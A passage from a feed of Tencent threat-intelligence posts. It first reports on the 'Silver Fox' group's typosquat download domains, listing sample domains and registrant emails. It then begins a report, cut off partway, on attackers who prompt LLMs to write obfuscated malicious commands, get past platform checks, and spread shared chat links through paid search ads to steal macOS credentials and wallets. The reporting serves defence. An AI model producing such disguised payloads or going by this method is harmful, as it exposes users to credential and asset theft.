</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">代码虚拟化对抗</span></strong><span leaf="">：恶意 DLL 内部使用了严苛的代码虚拟化保护，导致静态反编译工具无法还原出有意义的控制流，令分析者陷入“逻辑黑洞”。</span></p></li></ol><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">这种“寄生”于开源生态的手法，标志着该团伙在规避沙箱监测和反查杀层面已日臻成熟。欲了解该类样本演进的完整脉络，推荐往期的系列文章：<a class="normal_text_link" target="_blank" style="color: rgb(87, 107, 149);text-decoration: none;" href="https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247510749&amp;idx=1&amp;sn=380a24de9de0c991e7cf7feb321dee18&amp;scene=21#wechat_redirect" textvalue="" linktype="text" data-linktype="2">银狐情报共享第3期｜银狐软硬兼施，硬刚百款安全软件外，悄悄藏身杀软信任区</a>。</span></p><h3 data-heading="true" style="margin: 2em 8px 0.75em 0;color: #3f3f3f;font-weight: bold;line-height: 1.2;padding-left: 12px;font-size: 19.2px;border-left: 4px solid rgba(0, 82, 217, 1);border-bottom: 1px dashed rgba(0, 82, 217, 1);"><span leaf="">拓线分析：九百个虚假锚点的工业化扩张</span></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">通过对基础设施的深度溯源，我们发现了一个规模惊人的资产池：</span></p><ul style="margin-left: 0;color: #3f3f3f;list-style: none;padding-left: 1.5em;" class="list-paddingleft-1"><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">关键资产统计</span></strong><span leaf="">：</span></p></li><ul style="margin-left: 0;color: #3f3f3f;list-style: none;padding-left: 1.5em;" class="list-paddingleft-1"><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">关联域名总数</span></strong><span leaf="">：963 个</span></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">核心控制枢纽</span></strong><span leaf="">：</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">hudada265@gmail.com</span></code><span leaf="">（关联 129 个域名）、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">yaarluq55342@outlook.com</span></code><span leaf="">（关联 834 个域名）</span></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">程式化命名逻辑</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">   攻击者采用了高度标准化的 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">{前缀}-{品牌}-{后缀}</span></code><span leaf=""> 模式。</span></p></li><ol style="margin-left: 0;color: #3f3f3f;padding-left: 1.5em;" class="list-paddingleft-1"><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">1. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">伪造地理可信度</span></strong><span leaf="">：使用 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">cc-*</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">cn-*</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">cnzh-*</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">zhcn-*</span></code><span leaf="">（合计 69 个）。这些前缀旨在通过“中国/中文”的暗示，让用户误以为是品牌在华的官方镜像站。</span></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">2. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">伪装分发入口</span></strong><span leaf="">：使用 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">apps-*</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">pc-*</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">wap-*</span></code><span leaf="">。模拟官方的移动应用中心或桌面端下载专区。</span></p></li><li style="display: block;color: #3f3f3f;margin: 0.5em 8px;"><p><span leaf="">3. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">视觉与拼写错觉</span></strong><span leaf="">：刻意利用 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">sogou</span></code><span leaf="">/</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">sougou</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">chrome</span></code><span leaf="">/</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">chrom</span></code><span leaf="">/</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">goog</span></code><span leaf=""> 等拼写变体。这种“视线残留”欺诈在快节奏的搜索引擎点击中极难被肉眼识别。</span></p></li></ol></ul></ul><p style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;max-width: 100%;overflow: auto;"><table style="border-collapse:separate;border-spacing:0;border-radius:8px;margin:1em 8px;color:#3f3f3f;box-shadow:0 4px 6px rgba(0, 0, 0, 0.1);overflow:hidden;margin-top:0 !important;width:560px;"><thead><tr><th data-colwidth="119" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">  模式类型</span></p></th><th data-colwidth="193" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">            示例域名</span></p></th><th data-colwidth="248" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">典型特征</span></p></th></tr></thead><tbody><tr><td data-colwidth="119" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">地域标识型</span></strong></td><td data-colwidth="193" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">cc-google.com.cn</span></code><p><span leaf="">, </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">cn-wps.com.cn</span></code></p></td><td data-colwidth="248" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">增强“本土官方”假象</span></p></td></tr><tr><td data-colwidth="119" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">平台标识型</span></strong></td><td data-colwidth="193" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">apps-wps.com.cn</span></code><p><span leaf="">, </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">pc-google.com.cn</span></code></p></td><td data-colwidth="248" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">诱导软件下载行为</span></p></td></tr><tr><td data-colwidth="119" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">拼写变体型</span></strong></td><td data-colwidth="193" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">sougou-shu.com.cn</span></code><p><span leaf="">, </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">goog-chrome.com.cn</span></code></p></td><td data-colwidth="248" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">规避关键词检测</span></p></td></tr><tr><td data-colwidth="119" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">混淆字符型</span></strong></td><td data-colwidth="193" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">aoe-google.com.cn</span></code><p><span leaf="">, </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">safew-go.com.cn</span></code></p></td><td data-colwidth="248" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">模糊攻击意图</span></p></td></tr></tbody></table></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">银狐的仿冒网站目标选择主要聚焦于高流量、高办公依赖度的互联网基础设施。其仿冒目标分布如下：</span></p><p style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;max-width: 100%;overflow: auto;"><table style="border-collapse:separate;border-spacing:0;border-radius:8px;margin:1em 8px;color:#3f3f3f;box-shadow:0 4px 6px rgba(0, 0, 0, 0.1);overflow:hidden;margin-top:0 !important;width:556px;"><thead><tr><th data-colwidth="151" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">  目标品牌</span></p></th><th data-colwidth="87" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">占比</span></p></th><th data-colwidth="318" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">攻击战术特征</span></p></th></tr></thead><tbody><tr><td data-colwidth="151" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">某国外办公套件</span></strong><p><span leaf=""> (315+126)</span></p></td><td data-colwidth="87" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">45.8%</span></strong></td><td data-colwidth="318" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">针对跨境办公、开发者群体</span></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">某国内办公套件</span></strong><p><span leaf=""> (143)</span></p></td><td data-colwidth="87" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">14.8%</span></strong></td><td data-colwidth="318" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">渗透国产办公生态，利用用户对常用生产力工具的低警惕性</span></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">xx输入法</span></strong><p><span leaf=""> (73)</span></p></td><td data-colwidth="87" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">7.6%</span></strong></td><td data-colwidth="318" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">典型的“静默渗透”，输入法作为底层权限极高的软件，是绝佳的窃密跳板</span></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">其他</span></strong><p><span leaf=""> (291)</span></p></td><td data-colwidth="87" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p><span leaf="">30.3%</span></p></td><td data-colwidth="318" style="border: 1px solid #dfdfdf;color: #3f3f3f;word-break: keep-all;padding: 0.5em 1em;"><p style="text-align: left;"><span leaf="">涵盖 热门通讯软件、浏览器 等，以及本次行动的核心——OpenClaw</span></p></td></tr></tbody></table></p><h3 data-heading="true" style="margin: 2em 8px 0.75em 0;color: #3f3f3f;font-weight: bold;line-height: 1.2;padding-left: 12px;font-size: 19.2px;border-left: 4px solid rgba(0, 82, 217, 1);border-bottom: 1px dashed rgba(0, 82, 217, 1);"><span leaf="">结语</span></h3><div style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;"><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;margin-top: 0 !important;"><span leaf="">中国互联网正在经历一场“龙虾狂热”。从大厂抢滩到地方政府加码，所有人都在试图驯服这只代表着通用智能的“龙虾”，将其转化为生产力的增量。然而，在这场被媒体戏称为“龙虾盛宴”的狂欢背后，关于信任的博弈正在暗处角力。银狐团伙对热点的捕捉从不迟到。他们利用 AI 批量生产出的伪装站，不再是拙劣的模仿，而是对用户信任心理的精准解剖。</span></p><p data-line="80" style=";" data-pm-slice="0 0 []"><strong style=";"><span leaf="">针对OpenClaw安全风险，腾讯推出多场景安全防护矩阵：</span></strong></p><p data-line="82" style=";"><strong style=";"><span leaf="">本地个人：</span></strong></p><blockquote style=";"><p data-line="83" style=";"><span leaf=""><span textstyle="" style="font-weight: bold;">腾讯电脑管家18.0版本</span>为C端用户提供「龙虾管家-AI安全沙箱」，可实现“隔离运行、全程防护、行为可溯”，将“龙虾”放到“安全隔离房”里。</span></p></blockquote><p data-line="85" style=";"><strong style=";"><span leaf="">本地企业：</span></strong></p><blockquote style=";"><p data-line="86" style=";"><span leaf=""><span textstyle="" style="font-weight: bold;">腾讯iOA</span>为B端企业推出办公网安全方案，管控安装非法插件（Skills）、阻断非法访问、拦截数据窃取、限制违规外发，为企业构建全生命周期的安全防御。</span></p></blockquote><p data-line="88" style=";"><strong style=";"><span leaf="">云端部署</span></strong><span leaf="">：</span></p><blockquote style=";"><p data-line="89" style=";"><span leaf=""><span textstyle="" style="font-weight: bold;">Lighthouse</span> 与<span textstyle="" style="font-weight: bold;">腾讯云 ClawPro </span>自带云端物理防爆箱：环境隔离、最小化端口放行、一键快照回滚</span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-weight: bold;">AI Agent安全中心</span>对 AI Agent 部署情况、Agent 行为、异常指令以及 skills 风险进行全面管理与防护</span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-weight: bold;">Agent Runtime </span>提供 VM 级强隔离、网络隔离、文件隔离、零凭证访问等能力，支持数十万实例并发</span></p></blockquote><p data-line="93" style=";"><strong style=";"><span leaf="">Skills安全</span></strong><span leaf="">：</span></p><blockquote style=";"><p data-line="94" style=";"><span leaf=""><span textstyle="" style="font-weight: bold;">EdgeOne ClawScan</span> 一句话即可让龙虾自己安装，自动 “体检” 并输出报告</span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-weight: bold;">HaS Anonymizer</span> 隐私保护，支持文本 / 图片信息扫描、脱敏和还原</span></p><p><span leaf=""><span textstyle="" style="font-weight: bold;">威胁情报中心 </span>Skills安全检测，构建覆盖互联网威胁发现与未知样本检测的全方面防护能力</span></p></blockquote><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027713" data-ratio="1.8055555555555556" data-s="300,640" type="block" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9902de5d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXcdoyCTDLiaY8n4lL85KWGofq03Mac60k4F9J3MReqqmfmdDp7XaoIdoNhdO7iayUiaExD687cxFxZA3uafRv8lVOcVNcV9KKUws%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p data-line="98" style=";"><span leaf="">腾讯将持续跟进AI时代面临的新型威胁态势，为拥抱AI的每位用户保驾护航。</span></p><p data-line="98" style=";"><span leaf="">腾讯云安全威胁情报 Skill 安全守护计划正式发布，更多内容可查阅往期推送：👉 <a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511088&amp;idx=1&amp;sn=652370ddb00c4d2a2e075c3b3635f564&amp;scene=21#wechat_redirect" textvalue="腾讯云安全威胁情报SKill安全守护计划发布" data-itemshowtype="0" linktype="text" data-linktype="2">腾讯云安全威胁情报SKill安全守护计划发布</a></span></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://tix.qq.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=44194245&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511363%26idx%3D1%26sn%3D9485e074967faba84eae17b1522382c4">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 14 Mar 2026 09:05:00 +0800</pubDate>
    </item>
    <item>
      <title>“AI助手的背叛”｜利用大模型会话分享的SEO投毒攻击分析报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511136&amp;idx=1&amp;sn=70d5eaf376647f64e3753c6710bb466b</link>
      <description>新型攻击利用大模型会话分享+SEO投毒，借官方域名信任诱导执行恶意代码，精准窃取MacOS用户凭证及加密资产。警惕&#34;AI指南&#34;中的隐形陷阱！</description>
      <content:encoded><![CDATA[<p>原创 <span>腾讯威胁情报中心</span> <span>2026-03-04 10:01</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=37034951&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwVJmkLf2Cd9vFzDb5IO6jPXibTYLzSxux9C2O8ZNicGGUJcaMG7ytqOC0fRnciavjWc2nhCPxcUW3PWxMUtx8cvsFgoQWLNcU3wEU%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>新型攻击利用大模型会话分享+SEO投毒，借官方域名信任诱导执行恶意代码，精准窃取MacOS用户凭证及加密资产。警惕"AI指南"中的隐形陷阱！</p>
  <div style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;"><h2 data-heading="true" style="display: table;padding: 0px 0.2em;margin-right: auto;margin-bottom: 8px;margin-left: auto;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: 19.2px;font-weight: bold;text-align: center;margin-top: 0px !important;"><span leaf="">背景</span></h2><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">2026 年初，以 Kimi、智谱 GLM、MiniMax 为代表的国产大模型迎来爆发式普及。行业数据显示，相关模型在 API 调用量上于 2 月份环比暴涨 127%，在全球头部模型调用量前五中独占四席。这种现象级普及标志着 AI 助手已从“尝鲜工具”转变为 IT 从业者不可或缺的</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">生产力基础设施</span></strong><span leaf="">，开发者对这些主流平台的官方域名及回答内容产生了极高的生态黏性与心理信赖。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">然而，这种高度信任正演变为安全防御的新盲区。近日，我们监测到一种极具欺骗性的新型攻击范式：攻击者巧妙利用 LLM 平台的</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">公开会话分享功能</span></strong><span leaf="">，将精心构造的恶意载荷伪装成合法的技术方案嵌入对话中。通过</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">搜索引擎投毒</span></strong><span leaf="">手段，攻击者购入搜索引擎的“赞助商”排名，确保当用户检索特定技术故障或安装教程时，恶意分享链接能精准触达目标人群。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">这一攻击链条的致命性源于其对“信任链”的深度寄生</span></strong><span leaf="">：</span></p><ol style="padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">1. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">官方域名背书</span></strong><span leaf="">：受害者点击的是大模型厂商的</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">官方子域名</span></strong><span leaf="">，这类链接天然绕过了常规安全引擎对“钓鱼域名”的拦截逻辑。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">2. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">认知习惯利用</span></strong><span leaf="">：在 AI 驱动的现代化开发模式下，用户习惯于直接从对话框拷贝代码并在本地终端执行。攻击者正是利用了这种“信任平台即信任内容”的心理捷径，诱导用户运行经过混淆的恶意指令。</span></p></li></ol><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">这标志着社会工程学攻击已进入</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">信任链寄生</span></strong><span leaf="">的升维阶段——攻击者不再尝试正面打破防御，而是选择寄生在用户最信任的生产力入口内。一旦受害者在本地激活了看似无害的代码片段，其主机的敏感信息（如浏览器凭证、加密钱包密钥等）将面临全面失控，并被实时回传至攻击者控制的远程服务器。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">一旦受害者主机被植入后门，其内部存储的敏感信息将面临全面失控，并被实时回传至攻击者控制的服务器。</span></p><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img alt="新型LLM会话分享钓鱼攻击示意图" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027481" data-ratio="0.5583333333333333" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c007bfb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWricX3Iuick0STic2616BCyTgw1Craxw45C6HGF5uXK4ibXosr5DdibGqTW11wt6ibO3gScqe4f5fLtdWwyshEGyzl6ibb7ME21kzd8c%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: #888;font-size: 0.8em;"><span leaf="">新型LLM会话分享钓鱼攻击示意图</span></figcaption></figure><h2 data-heading="true" style="display: table;padding: 0px 0.2em;margin: 8px auto;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: 19.2px;font-weight: bold;text-align: center;"><span leaf="">攻击手法复现</span></h2><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">这一攻击链条巧妙地结合了 AI 生态功能与传统 SEO 攻击手段，通过“合规平台+恶意内容”的组合实现了极高成功率的入侵。以下是攻击者构建攻击链的核心步骤：</span></p><ol style="padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">1. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">诱导式提示词工程与恶意载荷植入</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">攻击者首先在大模型平台上发起对话，利用精心设计的提示词引导模型生成看似专业、实则包含恶意载荷的代码片段。为了规避平台自身的安全审计并增强隐蔽性，攻击者通常将恶意指令进行 </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">Base64 编码</span></strong><span leaf="">、混淆处理，或将其伪装成“官方安装脚本”、“一键优化补丁”。在会话中，攻击者还会利用 AI 生成极具说服力的步骤说明，诱导用户在本地终端（Terminal）中直接执行这些指令。</span></p></li></ol><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img alt="诱导提示词设计" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027477" data-ratio="0.6388888888888888" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=49c9c772&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwViaMrQvJMgprSkghgw6w3AmrCdH0jrs9TRpB2azgA4bFLHo0SUYP9ebgm7BkvOSRjMaPxSSnZyLrPnUCZVGYA4TWrQzG1j4u6U%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: #888;font-size: 0.8em;"><span leaf="">诱导提示词设计</span></figcaption></figure><ol style="padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">2. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">会话共享资产化与搜索引擎投毒</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">攻击者利用平台的“公开分享”功能提取官方域名的分享链接。随后，攻击者将该链接作为核心“钓鱼资产”，在搜索引擎中竞标技术类关键词（如“MacOS 空间清理”、“某编程助手安装教程”等），通过商业排名推广使其占据搜索结果的显著位置。由于展示的 URL 具有极高的权威性，受害者在检索技术方案时往往会忽略潜在风险，点击进入后按照“AI 指引”执行操作，最终导致恶意后门在本地静默植入。</span></p></li></ol><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img alt="链接分享示例" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027478" data-ratio="0.6407407407407407" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ffd1caf5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwW7oHoONu841vlBIBKS6HQERCicVF7epdSjXXDvk6tKPrYlT7p8J2wrEnV9Gf7BeQuq7ELqhACZIJrqobVIEXXIIpVL4nJeIDkU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: #888;font-size: 0.8em;"><span leaf="">链接分享示例</span></figcaption></figure><h2 data-heading="true" style="display: table;padding: 0px 